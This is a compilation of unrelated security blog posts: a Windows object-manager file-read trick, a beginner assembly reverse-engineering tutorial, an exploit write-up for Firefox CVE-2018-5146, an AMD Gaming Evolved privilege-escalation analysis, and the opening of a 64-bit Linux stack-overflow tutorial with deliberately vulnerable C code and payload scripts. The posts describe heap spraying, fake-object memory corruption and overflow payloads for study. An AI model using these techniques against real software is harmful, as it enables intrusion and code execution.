For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point otherwise you’ll try and open the SAM again). For the section as the object was created in our security context (just like the directory) and there was no explicit security descriptor then we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.

 

Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   Access Delete) {
 # Delete permanent object.
 $sect.MakeTemporary()
}

What I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7 so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GITHUB at this link if you want the final version to get a better understanding of how it works.

 

It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful as I did in this case. Many times I’ve found code which isn’t itself a vulnerability but have has some useful properties which allow you to build out exploitation chains.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initiating a string requires a call to a built in function for initiation.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!

Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Infomation

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146.
From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table.
The structure of Ogg Page can be illustrate as follow picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page.
One MIT document show the process of encapsulation.

3.2.1. Vorbis Header

In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are:

  • Vorbis Identification Header
    Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate.
  • Vorbis Comment Header
    Basically contains some user define comment, such as Vendor infomation。
  • Vorbis Setup Header
    Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode.
3.2.2. Vorbis Identification Header

Vorbis Identification Header structure can be illustrated as follow:

Pic.2 Vorbis Identification Header Structure

3.2.3. Vorbis Setup Header

Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks.
After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes.
Vorbis Setup Header Structure can be roughly illustrated as follow:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

As in Vorbis spec, a CodeBook structure can be represent as follow:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag.
Following as VQ-relative structure:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits.
Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float.
All of above build a CodeBook structure.

3.2.3.2. Vorbis Time

In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero.

3.2.3.3. Vorbis Floor

In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure.

3.2.3.4. Vorbis Residue

In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook define which CodeBook will be used when decode this ResidueBackend.
MapBackend and Mode dose not have influence to exploit so we skip them too.

4. Patch analysis

4.1. Patched Function

From blog of ZDI, we can see vulnerability inside following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
if (book->used_entries > 0)
{
int i, j, entry;
float *t;

if (book->dim > 8)
{
for (i = 0; i < n;) {
entry = decode_packed_entry_number(book, b);
if (entry == -1) return (-1);
t = book->valuelist + entry * book->dim;
for (j = 0; j < book->dim;)
{
a[i++] += t[j++];
}
}
else
{
// blablabla
}
}
return (0);
}

Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue.

In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”.

4.2. Buffer – a

After read some source , I found “a” was initialization in below code:

    /* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;ichannels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm[i]).
And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header.
So we can control the size of memory chunk alloc for “a”.
Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap.

4.3. Buffer – t

After read some source code , I found book->valuelist get its value from here:

    c->valuelist=_book_unquantize(s,n,sortindex);

And the logic of _book_unquantize can be show as follow:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
long j, k, count = 0;
if (b->maptype == 1 || b->maptype == 2)
{
int quantvals;
float mindel = _float32_unpack(b->q_min);
float delta = _float32_unpack(b->q_delta);
float *r = _ogg_calloc(n * b->dim, sizeof(*r));

switch (b->maptype)
{
case 1:

quantvals=_book_maptype1_quantvals(b);

// do some math work

break;
case 2:

float val=b->quantlist[j*b->dim+k];

// do some math work

break;
}

return (r);
}
return (NULL);
}

So book->valuelist was the data decode from corresponding CodeBook’s VQ data.
It was lie on mozJemalloc heap too.

4.4. Cola Time

So now we can see, when the vulnerability was triggered:

  • a
    • lie on mozJemalloc heap;
    • size controllable.
  • t
    • lie on mozJemalloc heap too;
    • content controllable.
  • book->dim
    • content controllable.

Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content.
But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work.

5. mozJemalloc

mozJemalloc is a heap manager Mozilla develop base on Jemalloc.
Following was some global variables can show you some information about mozJemalloc.

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTress

In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region.
And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena.
There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin.
Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run.

5.2. Run

The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size.
When alloc region from a Run, it will return first No-in-use region close to Run header.

5.3. Arena Partition

This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1.
In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object.
In this situation, we can say that JavaScript Arena was isolated with other Arenas.
But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit.
First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux.

6. Exploit

In the section, I will show how to build a exploit base on this vulnerability.

6.1. Build Ogg file

First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow:

Pic.4 PoC Ogg file partial data
We can see codebook->dim equal to 0x48。

6.2. Heap Spary

First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin.
Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved.
If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data.
So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array.

6.3. Modify Array Length

After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap.
So we can force a memory layout as follow:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound.
Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally memory will like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those object and we can do:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory.
But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory.

6.5. Fake JSObject

We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable)

Pic.5 Fake JavaScript Object

If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can read/write to arbitrarily memory now.
After this, all you need was a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we achieve our shellcode, process context as follow:

Pic.6 achieve shellcode
Corresponding memory chunk information as follow:

Pic.7 memory address information

But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it.

7. Relative code and works

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi

 

AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently along-side your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years, I update my AMD drivers and notice plays_service.exe” has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boiler plate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is python based and has been packaged with something like py2exe. While decompiling python byte code is rather trivial, the trick with these types of executables is identifying and locating the python classes. Python byte-code in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of python. The first string I track down is “Unable to create Python obj for executable name!” . At first glance it appears to be an error message if certain python objects aren’t created properly. Scrolling up in the function it references, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success, only one zip file exists and it is named python35.zip! It’s filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled bytecode python files which I presume to be the applications core source code and library dependencies.

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephermal port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter which holds the command to be processed. The second is a hash value of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command function, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.

The function logic is pretty straight forward. It performs a couple insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail of note is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.

Setup

Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA\220\001\n")
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RSP: 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
